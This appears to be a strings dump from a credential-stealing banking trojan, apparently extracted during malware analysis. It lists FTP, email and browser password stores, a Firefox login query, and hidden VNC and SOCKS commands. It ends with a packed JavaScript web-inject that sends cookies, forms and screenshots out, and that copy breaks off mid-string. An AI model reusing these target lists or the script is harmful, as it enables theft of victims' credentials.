Updated fail size %u != %u

Updated RSA Init fail = %u

Updated RSA Init fail = %u

Sign Bad = %u

Sign Bad = %u

Save New File = %u = %u

Save New File = %u = %u

Update_InstallNew = %u = %u

Update_InstallNew = %u = %u

[Pony] Fail Get Pass

[Pony] Fail Get Pass

Start Update: %s = %u

Start Update: %s = %u

download status = %u =%u

download status = %u =%u

Updated status = %u

Updated status = %u

DL_EXEC LOAD ERROR: %u = %s

DL_EXEC LOAD ERROR: %u = %s

DL_EXEC Status [Pipe]: %u-%u-%u-%u

DL_EXEC Status [Pipe]: %u-%u-%u-%u

DL_EXEC Status[Local]: %u = %u

DL_EXEC Status[Local]: %u = %u

Start Socks addr: %s

Start Socks addr: %s

Start Socks Status[Pipe]: %u-%u-%u

Start Socks Status[Pipe]: %u-%u-%u

Start Socks Status[Local]: %u

Start Socks Status[Local]: %u

Start VNC addr: %s

Start VNC addr: %s

Start VNC Status[Pipe]: %u-%u-%u

Start VNC Status[Pipe]: %u-%u-%u

Start VNC Status[Local]: %u

Start VNC Status[Local]: %u

msvcrt.dll

msvcrt.dll

%0.8X%0.8X%c

%0.8X%0.8X%c

firefox.exe

firefox.exe

explorer.exe

explorer.exe

SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\

SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\

%Program Files%\Mozilla Firefox\

%Program Files%\Mozilla Firefox\

mozsqlite3.dll

mozsqlite3.dll

sqlite3_open

sqlite3_open

sqlite3_exec

sqlite3_exec

sqlite3_close

sqlite3_close

sqlite3_free

sqlite3_free

Software\Microsoft\Windows\CurrentVersion\Internet Settings

Software\Microsoft\Windows\CurrentVersion\Internet Settings

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3

hXXp://

hXXp://

Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)

Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)

\\.\pipe\

\\.\pipe\

PID: %u [%0.2u:%0.2u:%0.2u]

PID: %u [%0.2u:%0.2u:%0.2u]

[BC] Cmd Ver Error

[BC] Cmd Ver Error

[BC] Wait Ping error %u[%u]

[BC] Wait Ping error %u[%u]

[BC] Fail Connect: %u

[BC] Fail Connect: %u

[BC] Fail read cmd

[BC] Fail read cmd

[BC] Cmd need reauth

[BC] Cmd need reauth

[BC] cmd error: %u

[BC] cmd error: %u

[BC] Cmd need disconnect

[BC] Cmd need disconnect

ntdll.dll

ntdll.dll

gdiplus.dll

gdiplus.dll

GdiplusShutdown

GdiplusShutdown

SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\

SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\

account.cfg

account.cfg

account.cfn

account.cfn

Dir #%u

Dir #%u

.oeaccount

.oeaccount

Software\Microsoft\Windows Live Mail

Software\Microsoft\Windows Live Mail

\Microsoft\Windows Live Mail

\Microsoft\Windows Live Mail

Software\Microsoft\Windows Mail

Software\Microsoft\Windows Mail

\Microsoft\Windows Mail

\Microsoft\Windows Mail

PopPort

PopPort

PopPassword

PopPassword

SmtpServer

SmtpServer

SmtpPort

SmtpPort

SmtpAccount

SmtpAccount

SmtpPassword

SmtpPassword

abe2869f-9b47-4cd9-a358-c22904dba7f7

abe2869f-9b47-4cd9-a358-c22904dba7f7

MS IE FTP Passwords

MS IE FTP Passwords

RushSite.xml

RushSite.xml

\FTPRush

\FTPRush

bitkinex.ds

bitkinex.ds

NDSites.ini

NDSites.ini

Software\LeechFTP

Software\LeechFTP

bookmark.dat

bookmark.dat

CLSID\{11C1D741-A95B-11d2-8A80-0080ADB32FF4}\InProcServer32

CLSID\{11C1D741-A95B-11d2-8A80-0080ADB32FF4}\InProcServer32

sites.db

sites.db

servers.xml

servers.xml

\FTPGetter

\FTPGetter

ESTdb2.dat

ESTdb2.dat

\Estsoft\ALFTP

\Estsoft\ALFTP

QData.dat

QData.dat

SM.arch

SM.arch

FTP .Link\shell\open\command

FTP .Link\shell\open\command

NppFTP.xml

NppFTP.xml

Software\MAS-Soft\FTPInfo\Setup

Software\MAS-Soft\FTPInfo\Setup

ServerList.xml

ServerList.xml

\FTPInfo

\FTPInfo

NovaFTP.db

NovaFTP.db

\INSoftware\NovaFTP

\INSoftware\NovaFTP

\sites.xml

\sites.xml

ftplast.osd

ftplast.osd

\SharedSettings.ccs

\SharedSettings.ccs

\SharedSettings.sqlite

\SharedSettings.sqlite

\SharedSettings_1_0_5.ccs

\SharedSettings_1_0_5.ccs

\SharedSettings_1_0_5.sqlite

\SharedSettings_1_0_5.sqlite

\32BitFtp.ini

\32BitFtp.ini

FTPCON

FTPCON

FTP CONTROL

FTP CONTROL

FTPVoyager.ftp

FTPVoyager.ftp

\RhinoSoft.com

\RhinoSoft.com

FTPVoyager.qc

FTPVoyager.qc

FTPVoyager.Archive

FTPVoyager.Archive

SiteInfo.QFP

SiteInfo.QFP

WinFTP

WinFTP

DeluxeFTP

DeluxeFTP

sites.xml

sites.xml

Staff-FTP

Staff-FTP

sites.ini

sites.ini

FreshFTP

FreshFTP

Software\FlashPeak\BlazeFtp\Settings

Software\FlashPeak\BlazeFtp\Settings

LastPassword

LastPassword

LastPort

LastPort

BlazeFtp

BlazeFtp

site.dat

site.dat

\BlazeFtp

\BlazeFtp

GoFTP

GoFTP

Connections.txt

Connections.txt

3D-FTP

3D-FTP

\3D-FTP

\3D-FTP

SOFTWARE\Classes\TypeLib\{F9043C88-F6F2-101A-A3C9-08002B2F49FB}\1.2\0\win32

SOFTWARE\Classes\TypeLib\{F9043C88-F6F2-101A-A3C9-08002B2F49FB}\1.2\0\win32

EasyFTP

EasyFTP

FTPNow

FTPNow

FTP Now

FTP Now

FTPShell

FTPShell

ftpshell.fsi

ftpshell.fsi

ftpsite.ini

ftpsite.ini

FTPList.db

FTPList.db

My FTP

My FTP

project.ini

project.ini

Mailbox.ini

Mailbox.ini

FTP Navigator

FTP Navigator

FTP Commander

FTP Commander

ftplist.txt

ftplist.txt

Software\Sota\FFFTP

Software\Sota\FFFTP

Software\Sota\FFFTP\Options

Software\Sota\FFFTP\Options

Software\FTPWare\COREFTP\Sites

Software\FTPWare\COREFTP\Sites

FtpPort

FtpPort

Software\Cryer\WebSitePublisher

Software\Cryer\WebSitePublisher

_Password

_Password

Software\NCH Software\ClassicFTP\FTPAccounts

Software\NCH Software\ClassicFTP\FTPAccounts

FtpPassword

FtpPassword

_FtpPassword

_FtpPassword

FtpServer

FtpServer

FtpUserName

FtpUserName

FtpDirectory

FtpDirectory

Software\FTPClient\Sites

Software\FTPClient\Sites

Software\SoftX.org\FTPClient\Sites

Software\SoftX.org\FTPClient\Sites

PortNumber

PortNumber

PassWord

PassWord

Software\South River Technologies\WebDrive\Connections

Software\South River Technologies\WebDrive\Connections

Software\LinasFTP\Site Manager

Software\LinasFTP\Site Manager

FTP destination password

FTP destination password

FTP destination server

FTP destination server

FTP destination port

FTP destination port

FTP destination user

FTP destination user

FTP destination catalog

FTP destination catalog

FTP profiles

FTP profiles

Msi.dll

Msi.dll

{74FF1730-B1F2-4D88-926B-1568FAE61DB7}

{74FF1730-B1F2-4D88-926B-1568FAE61DB7}

\PocoSystem.ini

\PocoSystem.ini

accounts.ini

accounts.ini

sites.dat

sites.dat

\LeapWare\LeapFTP

\LeapWare\LeapFTP

unleap.exe

unleap.exe

leapftp

leapftp

FtpIniName

FtpIniName

Software\Ghisler\Windows Commander

Software\Ghisler\Windows Commander

wcx_PTF.ini

wcx_PTF.ini

Server.Pass

Server.Pass

Server.Host

Server.Host

Server.User

Server.User

Server.Port

Server.Port

Last Server Pass

Last Server Pass

Last Server Port

Last Server Port

\sitemanager.xml

\sitemanager.xml

\recentservers.xml

\recentservers.xml

\filezilla.xml

\filezilla.xml

"password" : "

"password" : "

"password":"

"password":"

\drives.js

\drives.js

\ExpanDrive\favorites.js

\ExpanDrive\favorites.js

\ExpanDrive\drives.js

\ExpanDrive\drives.js

wiseftpsrvs.ini

wiseftpsrvs.ini

wisePTF.ini

wisePTF.ini

wiseftpsrvs.bin

wiseftpsrvs.bin

SOFTWARE\Classes\TypeLib\{CB1F2C0F-8094-4AAC-BCF5-41A64E27F777}

SOFTWARE\Classes\TypeLib\{CB1F2C0F-8094-4AAC-BCF5-41A64E27F777}

SOFTWARE\Classes\TypeLib\{9EA55529-E122-4757-BC79-E4825F80732C}

SOFTWARE\Classes\TypeLib\{9EA55529-E122-4757-BC79-E4825F80732C}

FTP Count

FTP Count

FTP File%u

FTP File%u

Robo-FTP

Robo-FTP

SOFTWARE\%s\FTPServers

SOFTWARE\%s\FTPServers

user.config

user.config

.duck

.duck

SiteServer %u\Host

SiteServer %u\Host

SiteServer %u\WebUrl

SiteServer %u\WebUrl

SiteServer %u\Remote Directory

SiteServer %u\Remote Directory

SiteServer %u-User

SiteServer %u-User

SiteServer %u-User PW

SiteServer %u-User PW

SiteServer %u\SFTP

SiteServer %u\SFTP

Keychain

Keychain

Software\Nico Mak Computing\WinZip\FTP

Software\Nico Mak Computing\WinZip\FTP

Password

Password

Software\Far\Plugins\FTP\Hosts

Software\Far\Plugins\FTP\Hosts

Software\Far2\Plugins\FTP\Hosts

Software\Far2\Plugins\FTP\Hosts

Software\Far Manager\Plugins\FTP\Hosts

Software\Far Manager\Plugins\FTP\Hosts

Software\Far\SavedDialogHistory\FTPHost

Software\Far\SavedDialogHistory\FTPHost

Software\Far2\SavedDialogHistory\FTPHost

Software\Far2\SavedDialogHistory\FTPHost

Software\Far Manager\SavedDialogHistory\FTPHost

Software\Far Manager\SavedDialogHistory\FTPHost

\win.ini

\win.ini

WS_FTP

WS_FTP

\Ipswitch\WS_FTP

\Ipswitch\WS_FTP

\GlobalSCAPE\CuteFTP

\GlobalSCAPE\CuteFTP

sm.dat

sm.dat

\GlobalSCAPE\CuteFTP Pro

\GlobalSCAPE\CuteFTP Pro

\GlobalSCAPE\CuteFTP Lite

\GlobalSCAPE\CuteFTP Lite

\CuteFTP

\CuteFTP

CUTEFTP

CUTEFTP

Software\GlobalSCAPE\CuteFTP 6 Home\QCToolbar

Software\GlobalSCAPE\CuteFTP 6 Home\QCToolbar

Software\GlobalSCAPE\CuteFTP 6 Professional\QCToolbar

Software\GlobalSCAPE\CuteFTP 6 Professional\QCToolbar

Software\GlobalSCAPE\CuteFTP 7 Home\QCToolbar

Software\GlobalSCAPE\CuteFTP 7 Home\QCToolbar

Software\GlobalSCAPE\CuteFTP 7 Professional\QCToolbar

Software\GlobalSCAPE\CuteFTP 7 Professional\QCToolbar

Software\GlobalSCAPE\CuteFTP 8 Home\QCToolbar

Software\GlobalSCAPE\CuteFTP 8 Home\QCToolbar

Software\GlobalSCAPE\CuteFTP 8 Professional\QCToolbar

Software\GlobalSCAPE\CuteFTP 8 Professional\QCToolbar

\Sites.dat

\Sites.dat

\Quick.dat

\Quick.dat

\History.dat

\History.dat

Software\BPFTP\Bullet Proof FTP\Main

Software\BPFTP\Bullet Proof FTP\Main

Software\BulletProof Software\BulletProof FTP Client\Main

Software\BulletProof Software\BulletProof FTP Client\Main

Software\BPFTP\Bullet Proof FTP\Options

Software\BPFTP\Bullet Proof FTP\Options

Software\BulletProof Software\BulletProof FTP Client\Options

Software\BulletProof Software\BulletProof FTP Client\Options

Software\BPFTP

Software\BPFTP

\SmartFTP

\SmartFTP

Favorites.dat

Favorites.dat

History.dat

History.dat

Software\TurboFTP

Software\TurboFTP

\TurboFTP

\TurboFTP

addrbk.dat

addrbk.dat

quick.dat

quick.dat

Port

Port

Login

Login

PasswordType

PasswordType

profiles.xml

profiles.xml

\FTP Explorer

\FTP Explorer

Software\FTP Explorer\FTP Explorer\Workspace\MFCToolBar-224

Software\FTP Explorer\FTP Explorer\Workspace\MFCToolBar-224

Software\FTP Explorer\Profiles

Software\FTP Explorer\Profiles

FtpSite.xml

FtpSite.xml

PK11_GetInternalKeySlot

PK11_GetInternalKeySlot

sqlite3.dll

sqlite3.dll

sqlite3_prepare

sqlite3_prepare

sqlite3_step

sqlite3_step

sqlite3_column_bytes

sqlite3_column_bytes

sqlite3_column_blob

sqlite3_column_blob

SELECT hostname, encryptedUsername, encryptedPassword FROM moz_logins

SELECT hostname, encryptedUsername, encryptedPassword FROM moz_logins

PTF://

PTF://

signons.sqlite

signons.sqlite

\profiles.ini

\profiles.ini

PathToExe

PathToExe

\Mozilla\Firefox\

\Mozilla\Firefox\

Firefox

Firefox

Software\Mozilla

Software\Mozilla

fireFTPsites.dat

fireFTPsites.dat

\Mozilla\SeaMonkey\

\Mozilla\SeaMonkey\

SeaMonkey

SeaMonkey

\Mozilla\Profiles\

\Mozilla\Profiles\

Mozilla

Mozilla

password 51:b:

password 51:b:

SMTP Email Address

SMTP Email Address

SMTP Server

SMTP Server

SMTP User Name

SMTP User Name

HTTP User

HTTP User

HTTP Server URL

HTTP Server URL

HTTPMail User Name

HTTPMail User Name

HTTPMail Server

HTTPMail Server

SMTP User

SMTP User

POP3 Port

POP3 Port

SMTP Port

SMTP Port

IMAP Port

IMAP Port

POP3 Password2

POP3 Password2

IMAP Password2

IMAP Password2

NNTP Password2

NNTP Password2

HTTPMail Password2

HTTPMail Password2

SMTP Password2

SMTP Password2

POP3 Password

POP3 Password

IMAP Password

IMAP Password

NNTP Password

NNTP Password

HTTPMail Password

HTTPMail Password

SMTP Password

SMTP Password

{X-X-X-XX-XXXXXX}

{X-X-X-XX-XXXXXX}

inetcomm server passwords

inetcomm server passwords

outlook account manager passwords

outlook account manager passwords

Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings

Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings

Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook

Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook

Pstorec.dll

Pstorec.dll

[VNC] EXEC: %s

[VNC] EXEC: %s

IE WND [%0.8X] ENABLED: %s VISIBLED: %s

IE WND [%0.8X] ENABLED: %s VISIBLED: %s

[%u] {%u, %u} {%u, %u} {%0.8X, %0.8X} = %s

[%u] {%u, %u} {%u, %u} {%0.8X, %0.8X} = %s

[VDESK] Read CMD %u[%u]

[VDESK] Read CMD %u[%u]

[VDESK] NOT AUTH CMD %u

[VDESK] NOT AUTH CMD %u

GetAsyncKeyState

GetAsyncKeyState

USER32.DLL

USER32.DLL

GetKeyboardState

GetKeyboardState

GetKeyState

GetKeyState

?WINMM.DLL

?WINMM.DLL

?DSOUND.DLL

?DSOUND.DLL

ZwConnectPort

ZwConnectPort

NTDLL.DLL

NTDLL.DLL

[VNC] PROCESS=%s

[VNC] PROCESS=%s

\explorer.exe

\explorer.exe

[VNC] SearchApp Status = %u

[VNC] SearchApp Status = %u

[VNC] FileName = %s

[VNC] FileName = %s

[VNC] CmdLine = %s

[VNC] CmdLine = %s

[VNC] W64 Redir OLD=%u

[VNC] W64 Redir OLD=%u

[VNC] CreateProcess Status = %u (%u)

[VNC] CreateProcess Status = %u (%u)

SysShadow

SysShadow

Chrome_WidgetWin_1

Chrome_WidgetWin_1

Chrome_WidgetWin_0

Chrome_WidgetWin_0

d3d10_1.dll

d3d10_1.dll

d3d10_1core.dll

d3d10_1core.dll

d3d10.dll

d3d10.dll

d3d10core.dll

d3d10core.dll

d2d1.dll

d2d1.dll

OPENGL32.dll

OPENGL32.dll

d3d9.dll

d3d9.dll

d3d11.dll

d3d11.dll

Dxtrans.dll

Dxtrans.dll

WinExec

WinExec

KERNEL32.dll

KERNEL32.dll

USER32.dll

USER32.dll

GDI32.dll

GDI32.dll

RegCloseKey

RegCloseKey

RegNotifyChangeKeyValue

RegNotifyChangeKeyValue

ADVAPI32.dll

ADVAPI32.dll

ShellExecuteA

ShellExecuteA

SHELL32.dll

SHELL32.dll

NETAPI32.dll

NETAPI32.dll

SHDeleteKeyA

SHDeleteKeyA

SHLWAPI.dll

SHLWAPI.dll

DeleteUrlCacheEntry

DeleteUrlCacheEntry

WININET.dll

WININET.dll

WS2_32.dll

WS2_32.dll

MSVCRT.dll

MSVCRT.dll

IPHLPAPI.DLL

IPHLPAPI.DLL

AVIFIL32.dll

AVIFIL32.dll

GetWindowsDirectoryW

GetWindowsDirectoryW

CallNamedPipeA

CallNamedPipeA

ConnectNamedPipe

ConnectNamedPipe

CreateNamedPipeW

CreateNamedPipeW

DisconnectNamedPipe

DisconnectNamedPipe

CreateNamedPipeA

CreateNamedPipeA

GetWindowsDirectoryA

GetWindowsDirectoryA

EnumWindows

EnumWindows

ActivateKeyboardLayout

ActivateKeyboardLayout

SetViewportOrgEx

SetViewportOrgEx

RegEnumKeyExA

RegEnumKeyExA

RegCreateKeyA

RegCreateKeyA

RegCreateKeyExA

RegCreateKeyExA

RegOpenKeyExA

RegOpenKeyExA

CryptImportKey

CryptImportKey

CryptDestroyKey

CryptDestroyKey

RegOpenKeyA

RegOpenKeyA

ole32.dll

ole32.dll

OLEAUT32.dll

OLEAUT32.dll

CertOpenSystemStoreA

CertOpenSystemStoreA

CertDeleteCertificateFromStore

CertDeleteCertificateFromStore

CertAddCertificateContextToStore

CertAddCertificateContextToStore

CertCloseStore

CertCloseStore

CertEnumCertificatesInStore

CertEnumCertificatesInStore

CertDuplicateCertificateContext

CertDuplicateCertificateContext

PFXExportCertStoreEx

PFXExportCertStoreEx

CRYPT32.dll

CRYPT32.dll

FindFirstUrlCacheEntryA

FindFirstUrlCacheEntryA

FindNextUrlCacheEntryA

FindNextUrlCacheEntryA

HttpAddRequestHeadersA

HttpAddRequestHeadersA

FindCloseUrlCache

FindCloseUrlCache

FindNextUrlCacheEntryW

FindNextUrlCacheEntryW

FindFirstUrlCacheEntryW

FindFirstUrlCacheEntryW

COMDLG32.dll

COMDLG32.dll

WININET.DLL

WININET.DLL

=)=2===~=

=)=2===~=

3 343=3_3

3 343=3_3

= =,=`=}=

= =,=`=}=

.pdata

.pdata

@.reloc

@.reloc

[%s - X64 EQ PID: %u TID: %u]

[%s - X64 EQ PID: %u TID: %u]

\SysWOW64\regsvr32.exe

\SysWOW64\regsvr32.exe

[Pony] Fail create process: %u

[Pony] Fail create process: %u

[PONY] Fail inject to process: %u

[PONY] Fail inject to process: %u

echrome.dll

echrome.dll

iexplore.exe

iexplore.exe

chrome.exe

chrome.exe

\System32\KERNEL32.DLL

\System32\KERNEL32.DLL

\System32\kernelbase.dll

\System32\kernelbase.dll

\ThemeApiPort

\ThemeApiPort

spoolsv.exe_1436_rwx_01460000_0007C000:

.text

.text

`.rdata

`.rdata

@.data

@.data

.reloc

.reloc

HHt.HHt

HHt.HHt

More information: hXXp://VVV.ibsensoftware.com/

More information: hXXp://VVV.ibsensoftware.com/

8HttpAddRequestHeadersA

8HttpAddRequestHeadersA

HttpOpenRequestA

HttpOpenRequestA

HttpOpenRequestW

HttpOpenRequestW

HttpQueryInfoA

HttpQueryInfoA

HttpSendRequestA

HttpSendRequestA

HttpSendRequestExA

HttpSendRequestExA

HttpSendRequestExW

HttpSendRequestExW

HttpSendRequestW

HttpSendRequestW

wininet.dll

wininet.dll

rapport

rapport

ieframe.dll

ieframe.dll

NSPR4.DLL

NSPR4.DLL

nss3.dll

nss3.dll

KERNEL32.DLL

KERNEL32.DLL

\Google\Chrome\User Data\Default\

\Google\Chrome\User Data\Default\

\Mozilla\Firefox\Profiles\

\Mozilla\Firefox\Profiles\

sol_chrome/

sol_chrome/

\Google\Chrome\User Data\Default\Pepper Data\Shockwave Flash\WritableRoot\

\Google\Chrome\User Data\Default\Pepper Data\Shockwave Flash\WritableRoot\

.rdata

.rdata

@http

@http

SELECT url FROM moz_places

SELECT url FROM moz_places

places.sqlite

places.sqlite

ie/history.txt

ie/history.txt

ff/history.txt

ff/history.txt

ff/%u/places.sqlite

ff/%u/places.sqlite

framework_key%

framework_key%

eval(function(p,a,c,k,e,r){e=function(c){return(c35?String.fromCharCode(c 29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w '};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b' e(c) '\\b','g'),k[c]);return p}('l 1e(i){j.P=i;j.x=s;j.19=2;j.O=l(){p(z L===\'I\'){L=l(){B{k E H("J.F.6.0")}A(e){}B{k E H("J.F.3.0")}A(e){}B{k E H("J.F")}A(e){}B{k E H("Y.F")}A(e){}k v}}k E L()};j.o=l(a,b,c,d){K f=j.O();K g=s;K h=j;G=(z(d)==\'I\')?v:q;b=\'/\' j.P \'/\' 1a.1b() \'/\' b;p(G==q){j.x=s;f.W=l(){B{p(f.Q==4){p(f.R!=T||f.y==\'-\'){h.x=v;p(z(d)=="l"){d(v)}}C{p(f.y==\' \'){h.x=q;p(z(d)=="l"){d(q)}}C{h.x=f.y;p(z(d)=="l"){d(f.y)}}}}}A(e){h.x=v;p(z(d)=="l"){d(v)}}}}f.1v(a,b,G);f.1g(c);p(G==q){k q}B{p(f.Q==4&&f.R==T){p(f.y==\'-\'){k v}C{p(f.y==\' \'){k q}C{k f.y}}}k v}A(e){k v}};j.1p=l(){k j.x};j.V=l(a,b,c){m=\'1/\' a;k j.o(\'u\',m,b,c)};j.X=l(a,b){m=\'2/\' a;k j.o(\'w\',m,s,b)};j.Z=l(a,b){m=\'3/\' a;k j.o(\'w\',m,s,b)};j.17=l(a){m=\'4/\';k j.o(\'w\',m,s,a)};j.18=l(a,b,c){t=(b==q)?\'S\':\'D\';k j.o(\'w\',\'5/\' t \'/\' a,s,c)};j.1c=l(a,b,c,d){t=(b==q)?\'S\':\'D\';k j.o(\'u\',\'5/\' t \'/\' a,c,d)};j.1d=l(a,b,c,d){t=(b==q)?\'S\':\'D\';p(z(c)==\'I\'||c==v){c=s;N=\'w\'}C{c=\'1f: \' c;N=\'u\'}k j.o(N,\'6/\' t \'/\' a,c,d)};j.M=l(a,b,c,d){t=(b==q)?\'S\':\'D\';k j.o(\'u\',\'7/\' t \'/\' a,c,d)};j.1h=l(a,b,c,d){m=\'8/\' b \'/\' c \'/\' 1i(a);k j.o(\'w\',m,s,d)};j.1j=l(a,b){m=\'9/\';k j.o(\'u\',m,a,b)};j.1k=l(a){m=\'10/\';k j.o(\'w\',m,s,a)};j.1l=l(a,b){m=\'11/\';k j.o(\'u\',m,a,b)};j.1m=l(a,b){m=\'12/\';k j.o(\'u\',m,a,b)};j.1n=l(a,b,c){m=\'13/\';M=a "\\r\\n" b;k j.o(\'u\',m,M,c)};j.1o=l(a,b){m=\'14/\' a;U=1q.1r.1s;k j.o(\'u\',m,U,b)};j.1t=l(a){m=\'15/\';k j.o(\'w\',m,s,a)};j.1u=l(a,b){m=\'16/\';k j.o(\'u\',m,a,b)}};',62,94,'|||||||||||||||||||this|return|function|Url||Query|if|true||null||POST|false|GET|_LastAsync|responseText|typeof|catch|try|else||new|XMLHTTP|Async|ActiveXObject|undefined|Msxml2|var|XMLHttpRequest|Post|Type|GetXHR|_Key|readyState|status||200|Data|SetVal|onreadystatechange|GetVal|Microsoft|DelVal||||||||ClearVals|GetServer|Version|Math|random|PostServer|Get|EQFramework|Cookie|send|ScreenShot|encodeURIComponent|LogAdd|UpdateConfig|StartSocks|StartVnc|SendForm|StartVideo|GetLastAsync|document|location|href|StopVideo|ExecVBS|open'.split('|'),0,{}));

eval(function(p,a,c,k,e,r){e=function(c){return(c35?String.fromCharCode(c 29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w '};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b' e(c) '\\b','g'),k[c]);return p}('l 1e(i){j.P=i;j.x=s;j.19=2;j.O=l(){p(z L===\'I\'){L=l(){B{k E H("J.F.6.0")}A(e){}B{k E H("J.F.3.0")}A(e){}B{k E H("J.F")}A(e){}B{k E H("Y.F")}A(e){}k v}}k E L()};j.o=l(a,b,c,d){K f=j.O();K g=s;K h=j;G=(z(d)==\'I\')?v:q;b=\'/\' j.P \'/\' 1a.1b() \'/\' b;p(G==q){j.x=s;f.W=l(){B{p(f.Q==4){p(f.R!=T||f.y==\'-\'){h.x=v;p(z(d)=="l"){d(v)}}C{p(f.y==\' \'){h.x=q;p(z(d)=="l"){d(q)}}C{h.x=f.y;p(z(d)=="l"){d(f.y)}}}}}A(e){h.x=v;p(z(d)=="l"){d(v)}}}}f.1v(a,b,G);f.1g(c);p(G==q){k q}B{p(f.Q==4&&f.R==T){p(f.y==\'-\'){k v}C{p(f.y==\' \'){k q}C{k f.y}}}k v}A(e){k v}};j.1p=l(){k j.x};j.V=l(a,b,c){m=\'1/\' a;k j.o(\'u\',m,b,c)};j.X=l(a,b){m=\'2/\' a;k j.o(\'w\',m,s,b)};j.Z=l(a,b){m=\'3/\' a;k j.o(\'w\',m,s,b)};j.17=l(a){m=\'4/\';k j.o(\'w\',m,s,a)};j.18=l(a,b,c){t=(b==q)?\'S\':\'D\';k j.o(\'w\',\'5/\' t \'/\' a,s,c)};j.1c=l(a,b,c,d){t=(b==q)?\'S\':\'D\';k j.o(\'u\',\'5/\' t \'/\' a,c,d)};j.1d=l(a,b,c,d){t=(b==q)?\'S\':\'D\';p(z(c)==\'I\'||c==v){c=s;N=\'w\'}C{c=\'1f: \' c;N=\'u\'}k j.o(N,\'6/\' t \'/\' a,c,d)};j.M=l(a,b,c,d){t=(b==q)?\'S\':\'D\';k j.o(\'u\',\'7/\' t \'/\' a,c,d)};j.1h=l(a,b,c,d){m=\'8/\' b \'/\' c \'/\' 1i(a);k j.o(\'w\',m,s,d)};j.1j=l(a,b){m=\'9/\';k j.o(\'u\',m,a,b)};j.1k=l(a){m=\'10/\';k j.o(\'w\',m,s,a)};j.1l=l(a,b){m=\'11/\';k j.o(\'u\',m,a,b)};j.1m=l(a,b){m=\'12/\';k j.o(\'u\',m,a,b)};j.1n=l(a,b,c){m=\'13/\';M=a "\\r\\n" b;k j.o(\'u\',m,M,c)};j.1o=l(a,b){m=\'14/\' a;U=1q.1r.1s;k j.o(\'u\',m,U,b)};j.1t=l(a){m=\'15/\';k j.o(\'w\',m,s,a)};j.1u=l(a,b){m=\'16/\';k j.o(\'u\',m,a,b)}};',62,94,'|||||||||||||||||||this|return|function|Url||Query|if|true||null||POST|false|GET|_LastAsync|responseText|typeof|catch|try|else||new|XMLHTTP|Async|ActiveXObject|undefined|Msxml2|var|XMLHttpRequest|Post|Type|GetXHR|_Key|readyState|status||200|Data|SetVal|onreadystatechange|GetVal|Microsoft|DelVal||||||||ClearVals|GetServer|Version|Math|random|PostServer|Get|EQFramework|Cookie|send|ScreenShot|encodeURIComponent|LogAdd|UpdateConfig|StartSocks|StartVnc|SendForm|StartVideo|GetLastAsync|document|location|href|StopVideo|ExecVBS|open'.split('|'),0,{}));

eval('var %s '

eval('var %s '

function(p,a,c,k,e,r){e=function(c){return(c35?String.fromCharCode(c 29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w '};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b' e(c) '\\b','g'),k[c]);return p}('=A k(){i.P=p;i.x=p;i.Y=3;i.O=k(){o(w H===\'I\'){H=k(){B{j A F("M.E.6.0")}z(e){}B{j A F("M.E.3.0")}z(e){}B{j A F("M.E")}z(e){}B{j A F("1q.E")}z(e){}j s}}j A H()};i.m=k(a,b,c,d){N f=i.O();N g=p;N h=i;G=(w(d)==\'I\')?s:q;b=\'/\' i.P \'/\' W.19() \'/\' b;o(G==q){i.x=p;f.1a=k(){B{o(f.T==4){o(f.R!=Q||f.y==\'-\'){h.x=s;o(w(d)=="k"){d(s)}}C{o(f.y==\' \'){h.x=q;o(w(d)=="k"){d(q)}}C{h.x=f.y;o(w(d)=="k"){d(f.y)}}}}}z(e){h.x=s;o(w(d)=="k"){d(s)}}}}f.1b(a,b,G);f.1e(c);o(G==q){j q}B{o(f.T==4&&f.R==Q){o(f.y==\'-\'){j s}C{o(f.y==\' \'){j q}C{j f.y}}}j s}z(e){j s}};i.1g=k(){j i.x};i.1p=k(a,b,c){l=\'1/\' a;j i.m(\'u\',l,b,c)};i.X=k(a,b){l=\'2/\' a;j i.m(\'v\',l,p,b)};i.Z=k(a,b){l=\'3/\' a;j i.m(\'v\',l,p,b)};i.17=k(a){l=\'4/\';j i.m(\'v\',l,p,a)};i.18=k(a,b,c){t=(b==q)?\'S\':\'D\';j i.m(\'v\',\'5/\' t \'/\' a,p,c)};i.1c=k(a,b,c,d){t=(b==q)?\'S\':\'D\';j i.m(\'u\',\'5/\' t \'/\' a,c,d)};i.1d=k(a,b,c,d){t=(b==q)?\'S\':\'D\';o(w(c)==\'I\'||c==s){c=p;K=\'v\'}C{c=\'1f: \' c;K=\'u\'}j i.m(K,\'6/\' t \'/\' a,c,d)};i.J=k(a,b,c,d){t=(b==q)?\'S\':\'D\';j i.m(\'u\',\'7/\' t \'/\' a,c,d)};i.1h=k(a,b,c,d){l=\'8/\' b \'/\' c \'/\' 1i(a);j i.m(\'v\',l,p,d)};i.1j=k(a,b){l=\'9/\';j i.m(\'u\',l,a,b)};i.1k=k(a){l=\'10/\';j i.m(\'v\',l,p,a)};i.1l=k(a,b){l=\'11/\';j i.m(\'u\',l,a,b)};i.1m=k(a,b){l=\'12/\';j i.m(\'u\',l,a,b)};i.1n=k(a,b,c){l=\'13/\';J=a "\\r\\n" b;j i.m(\'u\',l,J,c)};i.1o=k(a,b){l=\'14/\' a;U=V.1r.1s;j 